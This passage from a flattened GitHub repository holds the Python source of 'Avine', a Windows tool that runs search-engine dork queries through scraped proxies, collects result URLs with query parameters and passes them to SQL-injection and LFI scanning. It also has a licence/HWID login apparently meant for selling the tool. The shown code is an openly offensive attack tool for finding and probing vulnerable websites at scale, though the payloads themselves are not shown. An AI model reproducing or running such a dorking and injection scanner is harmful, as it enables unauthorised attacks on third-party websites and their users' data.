659 | Body = tag.find_all("a", class_="web-result-title-link") 660 | for Container in Body: 661 | badprox = 0 662 | link = Container['href'] 663 | Total_Found += 1 664 | threadn+=1 665 | if link not in Results: 666 | dupe+=1 667 | Duplicates = Total_Found - Valid 668 | Results.append(link) 669 | linkhost = link.split('.com')[0] 670 | if linkhost not in badlinks: 671 | dupe = 0 672 | counter = 0 673 | if '=' in link: 674 | Valid += 1 675 | badlinks.append(link) 676 | with open(r'results/search_links.txt', 'a') as File: 677 | File.write(link) + File.write('\n') 678 | sql(link) 679 | except: 680 | ProxyError+=1 681 | dorkparse = 0 682 | if engine == "Baidu": 683 | header = random.choice(headerz) 684 | url = f"https://www.baidu.com/s?wd={urllib.parse.quote(dorklia)}&rn=40&pn={first}" 685 | try: 686 | if proxytype != "Proxyless": 687 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 688 | else: 689 | response_2 = requests.get(url, headers=header, timeout=10) 690 | soup = BeautifulSoup(response_2.text, 'html.parser') 691 | TagList = soup.find_all('h3', class_="c-title t t tts-title") 692 | for tag in TagList: 693 | Body = tag.find_all('a') 694 | for Container in Body: 695 | badprox = 0 696 | link = Container['href'] 697 | Total_Found += 1 698 | threadn+=1 699 | if link not in Results: 700 | dupe+=1 701 | Duplicates = Total_Found - Valid 702 | Results.append(link) 703 | linkhost = link.split('.com')[0] 704 | if linkhost not in badlinks: 705 | dupe = 0 706 | counter = 0 707 | if '=' in link: 708 | Valid += 1 709 | badlinks.append(link) 710 | with open(r'results/baidu_links.txt', 'a') as File: 711 | File.write(link) + File.write('\n') 712 | sql(link) 713 | except: 714 | ProxyError+=1 715 | dorkparse = 0 716 | if engine == "Naver": 717 | header = random.choice(headerz) 718 | url = f"https://search.naver.com/search.naver?display=15&f=&filetype=0&page={first}&query={urllib.parse.quote(dorklia)}" 719 | try: 720 | if proxytype != "Proxyless": 721 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 722 | else: 723 | response_2 = requests.get(url, headers=header, timeout=10) 724 | soup = BeautifulSoup(response_2.text, 'html.parser') 725 | TagList = soup.find_all("div", class_="total_tit") 726 | for tag in TagList: 727 | Body = tag.find_all('a') 728 | for Container in Body: 729 | badprox = 0 730 | link = Container['href'] 731 | Total_Found += 1 732 | threadn+=1 733 | if link not in Results: 734 | dupe+=1 735 | Duplicates = Total_Found - Valid 736 | Results.append(link) 737 | linkhost = link.split('.net')[0] 738 | if linkhost not in badlinks: 739 | dupe = 0 740 | counter = 0 741 | if '=' in link: 742 | Valid += 1 743 | badlinks.append(link) 744 | with open(r'results/naver_links.txt', 'a') as File: 745 | File.write(link) + File.write('\n') 746 | sql(link) 747 | except: 748 | ProxyError+=1 749 | dorkparse = 0 750 | if engine == "Excite": 751 | header = random.choice(headerz) 752 | url = f"https://results.excite.com/serp?q={urllib.parse.quote(dorklia)}&page={first}" 753 | try: 754 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 755 | soup = BeautifulSoup(response_2.text, 'html.parser') 756 | TagList = soup.find_all("div", class_="web-bing__result") 757 | for tag in TagList: 758 | Body = tag.find_all('a') 759 | for Container in Body: 760 | badprox = 0 761 | link = Container['href'] 762 | Total_Found += 1 763 | threadn+=1 764 | if link not in Results: 765 | dupe+=1 766 | Duplicates = Total_Found - Valid 767 | Results.append(link) 768 | linkhost = link.split('.com')[0] 769 | if linkhost not in badlinks: 770 | dupe = 0 771 | counter = 0 772 | if '=' in link: 773 | Valid += 1 774 | badlinks.append(link) 775 | with open(r'results/excite_links.txt', 'a') as File: 776 | File.write(link) + File.write('\n') 777 | sql(link) 778 | except: 779 | ProxyError+=1 780 | dorkparse = 0 781 | except: 782 | Error+=1 783 | parse() 784 | threading.Thread(target=parse, args=()).start() 785 | if Total == dorklineint: 786 | print(logo) 787 | print() 788 | print(f"{green} Finished Getting URL's!{reset}") 789 | time.sleep(5) 790 | main2() 791 | 792 | def Drok(): 793 | global dorklia, droklist, linee, Error 794 | linee+=1 795 | try: 796 | with open(fileNameDork.name, 'r+', encoding='utf-8', errors='ignore') as e: 797 | ext = e.readlines() 798 | dorklia = ext[int(linee)].strip() 799 | except: 800 | Error+=1 801 | 802 | def parser2(): 803 | global proxylist, fileNameDork, dorkline, dorklineint, proxytype 804 | os.system('cls') 805 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | Parser") 806 | print(logo) 807 | print() 808 | print(f"{magenta} Select Your Proxy Types:{reset}") 809 | print(f"\n {lightblue} [1] {lightmagenta}HTTP(S)\n {lightblue} [2] {lightmagenta}SOCKS4\n {lightblue} [3] {lightmagenta}SOCKS5\n {lightblue} [4] {lightmagenta}Proxyless") 810 | try: 811 | question = int(input("")) 812 | except Exception: 813 | print(f"{red}Invalid option{reset}") 814 | time.sleep(2) 815 | main2() 816 | if question == 1: 817 | proxytype = "https" 818 | elif question == 2: 819 | proxytype = "socks4" 820 | elif question == 3: 821 | proxytype = "socks5" 822 | elif question == 4: 823 | proxytype = "Proxyless" 824 | else: 825 | print(f"{red}Invalid option{reset}") 826 | time.sleep(2) 827 | main2() 828 | if proxytype != "Proxyless": 829 | os.system('cls') 830 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | Parser") 831 | print(" Coded by KillinMachine") 832 | print(f" Select your proxies file ({proxytype})") 833 | fileNameProxy = filedialog.askopenfile(parent=root, mode='rb', title=f'Choose a {proxytype} Proxies File', 834 | filetype=(("txt", "*.txt"), ("All files", "*.txt"))) 835 | if fileNameProxy is None: 836 | parser() 837 | else: 838 | try: 839 | with open(fileNameProxy.name, 'r+', encoding='utf-8', errors='ignore') as e: 840 | ext = e.readlines() 841 | for line in ext: 842 | try: 843 | proxyline = line.split()[0].replace('\n', '') 844 | proxylist.append(proxyline) 845 | except: 846 | pass 847 | print(f" Loaded [{len(proxylist)}] proxies lines.") 848 | time.sleep(2) 849 | except Exception: 850 | print("Your proxy file is probably harmed, please try again..") 851 | print(" Select your dork file") 852 | fileNameDork = filedialog.askopenfile(parent=root, mode='rb', title='Choose your dork file', 853 | filetype=(("txt", "*.txt"), ("All files", "*.txt"))) 854 | if fileNameDork is None: 855 | parser() 856 | else: 857 | try: 858 | with open(fileNameDork.name, 'r+', encoding='utf-8', errors='ignore') as e: 859 | ext = e.readlines() 860 | for line in ext: 861 | try: 862 | dorkline = line.split()[0].replace('\n', '') 863 | dorklist.append(dorkline) 864 | except: 865 | pass 866 | print(f" Loaded [{len(dorklist)}] Dork lines.") 867 | time.sleep(2) 868 | except Exception: 869 | print("Your Dork file is probably harmed, please try again..") 870 | dorklineint = len(dorklist) 871 | os.system('cls') 872 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | Parsed dorks = {Total} | Total Found Links = {Total_Found} | Duplicates = {Duplicates} | Valid Links = {Valid} | Proxy Error = {ProxyError} | Error = {Error}") 873 | Drok() 874 | proxy() 875 | threading.Thread(target=parse, args=()).start() #i would just make this a for loop for people who want custom threads maybe in an update in 2050 :D 876 | threading.Thread(target=parse, args=()).start() 877 | threading.Thread(target=parse, args=()).start() 878 | threading.Thread(target=parse, args=()).start() 879 | threading.Thread(target=parse, args=()).start() 880 | threading.Thread(target=parse, args=()).start() 881 | threading.Thread(target=parse, args=()).start() #thats a lot 882 | 883 | def parser(): 884 | global engine, first 885 | os.system('cls') 886 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | Parser") 887 | print(logo) 888 | print() 889 | print( f"{magenta} Pick a Search Engine{reset}" ) 890 | print(f"\n {lightblue}[1] {lightmagenta}Bing\n {lightblue}[2] {lightmagenta}Google\n {lightblue}[3] {lightmagenta}Yahoo\n {lightblue}[4] {lightmagenta}Ask\n {lightblue}[5] {lightmagenta}Rambler\n {lightblue}[6] {lightmagenta}Search\n {lightblue}[7] {lightmagenta}Baidu\n {lightblue}[8] {lightmagenta}Naver\n {lightblue}[9] {lightmagenta}Excite\n\n {lightblue}[0] {lightmagenta}Return") 891 | try: 892 | question = int(input("")) 893 | except Exception: 894 | print(f"{red}Invalid input{reset}") 895 | time.sleep(2) 896 | parser() 897 | if question == 1: 898 | engine = "Bing" 899 | parser2() 900 | elif question == 2: 901 | engine = "Google" 902 | parser2() 903 | elif question == 3: 904 | engine = "Yahoo" 905 | parser2() 906 | elif question == 4: 907 | engine = "Ask" 908 | parser2() 909 | elif question == 5: 910 | engine = "Rambler" 911 | parser2() 912 | elif question == 6: 913 | engine = "Search" 914 | parser2() 915 | elif question == 7: 916 | engine = "Baidu" 917 | parser2() 918 | elif question == 8: 919 | first = 2 920 | engine = "Naver" 921 | parser2() 922 | elif question == 9: 923 | engine = "Excite" 924 | parser2() 925 | elif question == 0: 926 | main2() 927 | else: 928 | print(f"{red}Invalid input{reset}") 929 | time.sleep(1) 930 | parser() 931 | 932 | def proxyscrapeScraper(proxytype, timeout, country, pathTextFile): 933 | response = requests.get("https://api.proxyscrape.com/?request=getproxies&proxytype=" + proxytype + "&timeout=" + timeout + "&country=" + country) 934 | proxies = response.text 935 | with open(pathTextFile, "a") as txt_file: 936 | txt_file.write(proxies) 937 | 938 | def proxyListDownloadScraper(url, type, anon, pathTextFile): 939 | session = requests.session() 940 | url = url + '?type=' + type + '&anon=' + anon 941 | html = session.get(url).text 942 | with open(pathTextFile, "a") as txt_file: 943 | for line in html.split('\n'): 944 | if len(line) > 0: 945 | txt_file.write(line) 946 | 947 | def makesoup(url): #i love to make soup 948 | page=requests.get(url) 949 | return BeautifulSoup(page.text,"html.parser") 950 | 951 | def proxyscrape(table): #just simple shit 952 | proxies = set() 953 | for row in table.findAll('tr'): 954 | countt = 0 955 | proxy = "" 956 | for cell in row.findAll('td'): 957 | if count == 1: 958 | proxy += ":" + cell.text.replace(' ', '') 959 | proxies.add(proxy) 960 | break 961 | proxy += cell.text.replace(' ', '') 962 | countt += 1 963 | return proxies 964 | 965 | def scrapeproxies(url, pathTextFile): 966 | soup=makesoup(url) 967 | result = proxyscrape(table = soup.find('table', attrs={'class': 'table table-striped table-bordered'})) 968 | proxies = set() 969 | proxies.update(result) 970 | with open(pathTextFile, "a") as txt_file: 971 | for line in proxies: 972 | txt_file.write("".join(line) + "\n") 973 | 974 | def output(pathTextFile): 975 | try: 976 | with open(pathTextFile, 'r+', encoding='utf-8', errors='ignore') as txt_file: 977 | ext = txt_file.readlines() 978 | lineas = len(ext) 979 | if os.path.exists(pathTextFile): 980 | os.remove(pathTextFile) 981 | elif not os.path.exists(pathTextFile): 982 | with open(pathTextFile, 'w'): pass 983 | except: 984 | pass 985 | os.system('cls') 986 | print(logo) 987 | print() 988 | try: 989 | print(f''' {magenta}Finished Scraping Proxies! 990 | {yellow}[{cyan}{lineas}{yellow}]{lightblue} Proxies found!''') 991 | except: 992 | print(f" {magenta}Finished Scraping Proxies!") 993 | time.sleep(3) 994 | main2() 995 | 996 | def ProxyScrape(): #shit sources but still proxies 997 | global proxyType 998 | pathTextFile = [] 999 | os.system('cls') 1000 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | ProxyScrape") 1001 | print(logo) 1002 | print() 1003 | print(f"{magenta} Pick The Type Of Proxies You Would Like To Scrape:{reset}") 1004 | print(f"\n {lightblue} [1] {lightmagenta}HTTPS\n {lightblue} [2] {lightmagenta}HTTP\n {lightblue} [3] {lightmagenta}SOCKS\n {lightblue} [4] {lightmagenta}SOCKS4\n {lightblue} [5] {lightmagenta}SOCKS5\n\n {lightblue} [6] {lightmagenta}Return") 1005 | try: 1006 | question = int(input("")) 1007 | except Exception: 1008 | print(f"{red}Invalid option{reset}") 1009 | time.sleep(2) 1010 | ProxyScrape() 1011 | if question == 1: 1012 | proxyType = "https" 1013 | pathTextFile = "results/https_proxies.txt" 1014 | threading.Thread(target=scrapeproxies, args=('http://sslproxies.org',pathTextFile)).start() 1015 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'https', 'elite',pathTextFile)).start() 1016 | output(pathTextFile) 1017 | elif question == 2: 1018 | proxyType = "http" 1019 | pathTextFile = "results/http_proxies.txt" 1020 | threading.Thread(target=scrapeproxies, args=('http://free-proxy-list.net',pathTextFile)).start() 1021 | threading.Thread(target=scrapeproxies, args=('http://us-proxy.org',pathTextFile)).start() 1022 | threading.Thread(target=proxyscrapeScraper, args=('http','1000','All',pathTextFile)).start() 1023 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'elite',pathTextFile)).start() 1024 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'transparent',pathTextFile)).start() 1025 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'anonymous',pathTextFile)).start() 1026 | output(pathTextFile) 1027 | elif question == 3: 1028 | proxyType = "socks" 1029 | pathTextFile = "results/socks_proxies.txt" 1030 | threading.Thread(target=scrapeproxies, args=('http://socks-proxy.net',pathTextFile)).start() 1031 | threading.Thread(target=proxyscrapeScraper, args=('socks4','1000','All',pathTextFile)).start() 1032 | threading.Thread(target=proxyscrapeScraper, args=('socks5','1000','All',pathTextFile)).start() 1033 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks5', 'elite',pathTextFile)).start() 1034 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks4', 'elite',pathTextFile)).start() 1035 | output(pathTextFile) 1036 | elif question == 4: 1037 | proxyType = "socks4" 1038 | pathTextFile = "results/socks4_proxies.txt" 1039 | threading.Thread(target=proxyscrapeScraper, args=('socks4','1000','All',pathTextFile)).start() 1040 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks4', 'elite',pathTextFile)).start() 1041 | output(pathTextFile) 1042 | elif question == 5: 1043 | proxyType = "socks5" 1044 | pathTextFile = "results/socks5_proxies.txt" 1045 | threading.Thread(target=proxyscrapeScraper, args=('socks5','1000','All',pathTextFile)).start() 1046 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks5', 'elite',pathTextFile)).start() 1047 | output(pathTextFile) 1048 | elif question == 6: 1049 | main2() 1050 | else: 1051 | print(f"{red}Invalid option{reset}") 1052 | time.sleep(2) 1053 | ProxyScrape() 1054 | 1055 | def vuln(): #never finished vuln scanners 1056 | global fileNameUrl, linee, counter 1057 | linee = 0 1058 | counter = 0 1059 | os.system('cls') 1060 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | Vulnerability Scanner") 1061 | print(logo) 1062 | print() 1063 | print(f"{magenta} What kind of vulnerability do you want to scan for?{reset}") 1064 | print(f"\n {lightblue} [1] {lightmagenta}SQLI\n {lightblue} [2] {lightmagenta}LFI\n\n {lightblue} [3] {lightmagenta}Return") 1065 | try: 1066 | question = int(input("")) 1067 | except Exception: 1068 | print(f"{red}Invalid option{reset}") 1069 | time.sleep(2) 1070 | vuln() 1071 | if question == 1: 1072 | os.system('cls') 1073 | print(logo) 1074 | print() 1075 | print(f"\n {lightblue} [1] {lightmagenta}Save Payload\n {lightblue} [2] {lightmagenta}Dont Save Payload\n\n {lightblue} [3] {lightmagenta}Return") 1076 | try: 1077 | question = int(input("")) 1078 | except Exception: 1079 | print(f"{red}Invalid option{reset}") 1080 | time.sleep(2) 1081 | vuln() 1082 | if question == 1: 1083 | savepayload = "true" 1084 | if question == 2: 1085 | savepayload = "false" 1086 | if question == 3: 1087 | vuln() 1088 | os.system('cls') 1089 | print(logo) 1090 | print() 1091 | print(f" Select your urls!") 1092 | fileNameUrl = filedialog.askopenfile(parent=root, mode='rb', title=f'Choose your urls', 1093 | filetype=(("txt", "*.txt"), ("All files", "*.txt"))) 1094 | if fileNameUrl is None: 1095 | vuln() 1096 | else: 1097 | try: 1098 | with open(fileNameUrl.name, 'r+', encoding='utf-8', errors='ignore') as e: 1099 | ext = e.readlines() 1100 | for line in ext: 1101 | try: 1102 | urlline = line.split()[0].replace('\n', '') 1103 | urllist.append(urlline) 1104 | except: 1105 | pass 1106 | print(f" Loaded [{len(urllist)}] url's") 1107 | time.sleep(2) 1108 | except Exception: 1109 | print("Your urls file is probably harmed, please try again..") 1110 | vulnscan() 1111 | elif question == 2: 1112 | os.system('cls') 1113 | print(logo) 1114 | print() 1115 | print(f"\n {lightblue} [1] {lightmagenta}Save Path\n {lightblue} [2] {lightmagenta}Dont Save Path\n\n {lightblue} [3] {lightmagenta}Return") 1116 | try: 1117 | question = int(input("")) 1118 | except Exception: 1119 | print(f"{red}Invalid option{reset}") 1120 | time.sleep(2) 1121 | vuln() 1122 | if question == 1: 1123 | savepayload = "true" 1124 | if question == 2: 1125 | savepayload = "false" 1126 | if question == 3: 1127 | vuln() 1128 | os.system('cls') 1129 | print(logo) 1130 | print() 1131 | print(f" Select your your urls") 1132 | fileNameUrl = filedialog.askopenfile(parent=root, mode='rb', title=f'Choose your urls', 1133 | filetype=(("txt", "*.txt"), ("All files", "*.txt"))) 1134 | if fileNameUrl is None: 1135 | vuln() 1136 | else: 1137 | try: 1138 | with open(fileNameUrl.name, 'r+', encoding='utf-8', errors='ignore') as e: 1139 | ext = e.readlines() 1140 | for line in ext: 1141 | try: 1142 | urlline = line.split()[0].replace('\n', '') 1143 | urllist.append(urlline) 1144 | except: 1145 | pass 1146 | print(f" Loaded [{len(urllist)}] url's") 1147 | time.sleep(2) 1148 | except Exception: 1149 | print("Your urls file is probably harmed, please try again..") 1150 | lfiscan() 1151 | elif question == 2: 1152 | vuln() 1153 | else: 1154 | print(f"{red}Invalid option{reset}") 1155 | time.sleep(2) 1156 | vuln() 1157 | 1158 | def verify_hmac(raw_body, client_signature: str, hmac_secret: bytes) -> bool: 1159 | computed_sha = hmac.new(hmac_secret, 1160 | raw_body, 1161 | digestmod=hashlib.sha256).hexdigest() 1162 | return computed_sha == client_signature 1163 | 1164 | def main2(): #was once main but then i realized i needed an auth if i wanted to sell but its pointless now 1165 | os.system('cls') 1166 | print(logo) 1167 | print() 1168 | print(f"{magenta} Pick an option:{reset}") 1169 | print(f"\n {lightblue} [1] {lightmagenta}Parser\n {lightblue} [2] {lightmagenta}ProxyScrape\n {lightblue} [3] {lightmagenta}Vuln Check") 1170 | try: 1171 | question = int(input("")) 1172 | except Exception: 1173 | print(f"{red}Invalid option{reset}") 1174 | time.sleep(2) 1175 | main2() 1176 | if question == 1: 1177 | parser() 1178 | elif question == 2: 1179 | ProxyScrape() 1180 | elif question == 3: 1181 | vuln() 1182 | else: 1183 | print(f"{red}Invalid option{reset}") 1184 | time.sleep(2) 1185 | main2() 1186 | 1187 | def main(): #if anyone skids avine your welcome for this 1188 | if not os.path.exists('results'): 1189 | os.makedirs('results') 1190 | os.system('cls') 1191 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570") 1192 | print(logo) 1193 | print() 1194 | print(f"{magenta} Pick an option:{reset}") 1195 | print(f"\n {lightblue} [1] {lightmagenta}Login\n {lightblue} [2] {lightmagenta}Reset HWID\n {lightblue} [3] {lightmagenta}Credits\n {lightblue} [4] {lightmagenta}Main (select this to get to the program)") 1196 | try: 1197 | question = int(input("")) 1198 | except Exception: 1199 | print(f"{red}Invalid option{reset}") 1200 | time.sleep(2) 1201 | main() 1202 | if question == 1: 1203 | try: 1204 | os.system('cls') 1205 | print(logo) 1206 | print() 1207 | secret = b"your hmac client secret" 1208 | hwid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip() 1209 | print(f"{magenta} Enter your username:{reset}") 1210 | username = (input(" ")) 1211 | print(f"{magenta} Enter your password:{reset}") 1212 | password = (input(" ")) 1213 | aid = "your aid" 1214 | api_key = "your api key" 1215 | nonce = random.randint(1000000000, 1000000000000) 1216 | payload = {"username": username, "password": password, "hwid": hwid, "aid": aid, "key": api_key, "nonce": nonce} 1217 | h = hmac.new(secret, json.dumps(payload).encode("utf-8"), digestmod=hashlib.sha256).hexdigest() 1218 | r = requests.post("http://api.ccauth.app/api/v4/authenticate", headers={"X-CCAuth-Signature": h}, json=payload) #chanchan auth https://github.com/chanchan69/VegetablesAuth.py 1219 | is_verified = verify_hmac(r.text.encode(), r.headers["X-CCAuth-Signature"], secret) 1220 | r = r.json() 1221 | if r["success"] and r["nonce"] == nonce: 1222 | if is_verified: 1223 | if not r["licenseInfo"]["expired"]: 1224 | os.system('cls') 1225 | print(logo) 1226 | print() 1227 | print(f"{magenta} Authenticated") 1228 | time.sleep(1) 1229 | main2() 1230 | else: 1231 | os.system('cls') 1232 | print(logo) 1233 | print() 1234 | print(f"{red} Your License has expired.") 1235 | time.sleep(4) 1236 | sys.exit 1237 | else: 1238 | os.system('cls') 1239 | print(logo) 1240 | print() 1241 | print(f"{red} Invalid hmac sig") 1242 | time.sleep(2) 1243 | main() 1244 | else: 1245 | if r["errorDetails"]["type"] == "credentials": 1246 | os.system('cls') 1247 | print(logo) 1248 | print() 1249 | print(f"{red} Invalid Username/Password") 1250 | time.sleep(2) 1251 | main() 1252 | elif r["errorDetails"]["type"] == "hwid": 1253 | os.system('cls') 1254 | print(logo) 1255 | print() 1256 | print(f"{red} Invalid HWID") 1257 | time.sleep(2) 1258 | main() 1259 | else: 1260 | os.system('cls') 1261 | print(logo) 1262 | print() 1263 | print(r["errorDetails"]["type"]) 1264 | time.sleep(3) 1265 | sys.exit 1266 | except: 1267 | os.system('cls') 1268 | print(logo) 1269 | print() 1270 | print(f"{red} There was an error!") 1271 | time.sleep(5) 1272 | main() 1273 | elif question == 2: 1274 | try: 1275 | secret = b"your hmac client secret" 1276 | hwid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip() 1277 | print(f"{magenta} Enter your username:{reset}") 1278 | username = (input(" ")) 1279 | print(f"{magenta} Enter your password:{reset}") 1280 | password = (input(" ")) 1281 | aid = "your aid" 1282 | api_key = "your api key" 1283 | print(f"{magenta} Enter your Reset Key:{reset}") 1284 | reset_key = (input(" ")) 1285 | payload = {"username": username, "password": password, "hwid": hwid, "aid": aid, "key": api_key, "resetKey": reset_key} 1286 | h = hmac.new(secret, json.dumps(payload).encode("utf-8"), digestmod=hashlib.sha256).hexdigest() 1287 | r = requests.post("http://127.0.0.1:5000/api/v4/reset", headers={"X-CCAuth-Signature": h}, json=payload) 1288 | is_verified = verify_hmac(r.text.encode(), r.headers["X-CCAuth-Signature"], secret) 1289 | r = r.json() 1290 | if r["success"]: 1291 | if is_verified: 1292 | print(f"{magenta} Your HWID has been reset!") 1293 | time.sleep(1) 1294 | main() 1295 | else: 1296 | print(f"{red} Invalid hmac") 1297 | else: 1298 | if r["errorDetails"]["type"] == "invalid key": 1299 | os.system('cls') 1300 | print(logo) 1301 | print() 1302 | print(f"{red} Invalid Reset Key!") 1303 | time.sleep(3) 1304 | main() 1305 | elif r["errorDetails"]["type"] == "settings": 1306 | os.system('cls') 1307 | print(logo) 1308 | print() 1309 | print(f"{red} HWID Resets are disabled!") 1310 | time.sleep(3) 1311 | main() 1312 | elif r["errorDetails"]["type"] == "reseting too fast": 1313 | os.system('cls') 1314 | print(logo) 1315 | print() 1316 | print(f"{red} Your HWID has been reset in the last 24 hours!") 1317 | time.sleep(3) 1318 | main() 1319 | else: 1320 | os.system('cls') 1321 | print(logo) 1322 | print() 1323 | print(f" Failed with error:") 1324 | print(r["errorDetails"]["type"]) 1325 | except: 1326 | os.system('cls') 1327 | print(logo) 1328 | print() 1329 | print(f"{red} There was an error!") 1330 | time.sleep(5) 1331 | main() 1332 | if question == 3: 1333 | os.system('cls') 1334 | print(logo) 1335 | print() 1336 | print(f''' {magenta}Credits: 1337 | {lightblue}Made By{yellow}: {cyan}KillinMachine#2570 1338 | {lightblue}Discord{yellow}: {cyan}discord.gg/txytskBP3s 1339 | 1340 | {magenta}Press enter to go back.''') 1341 | if (input("")): 1342 | main() 1343 | elif question == 4: 1344 | main2() 1345 | else: 1346 | print(f"{red}Invalid option{reset}") 1347 | time.sleep(2) 1348 | main() 1349 | main() 1350 | -------------------------------------------------------------------------------- /pictures/engines.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/engines.png -------------------------------------------------------------------------------- /pictures/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/login.png -------------------------------------------------------------------------------- /pictures/modules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/modules.png -------------------------------------------------------------------------------- /pictures/parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/parser.png -------------------------------------------------------------------------------- /pictures/sqliscan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/sqliscan.png -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | altgraph==0.17.2 2 | beautifulsoup4==4.11.1 3 | bs4==0.0.1 4 | certifi==2022.5.18.1 5 | charset-normalizer==2.0.12 6 | colorama==0.4.4 7 | future==0.18.2 8 | idna==3.3 9 | Nuitka==0.9.6 10 | pefile==2022.5.30 11 | psutil==5.9.1 12 | pyarmor==7.5.1 13 | pyinstaller==5.2 14 | pyinstaller-hooks-contrib==2022.8 15 | pypresence==4.2.1 16 | pywin32-ctypes==0.2.0 17 | requests==2.27.1 18 | soupsieve==2.3.2.post1 19 | urllib3==1.26.9 20 | -------------------------------------------------------------------------------- /results/results here.txt: -------------------------------------------------------------------------------- 1 | i hope you stared my project on github bc those are like social credits to me ngl and if i dont have enough my government will find me (im blinking twice pls save me and star 2 | my project thanks) --------------------------------------------------------------------------------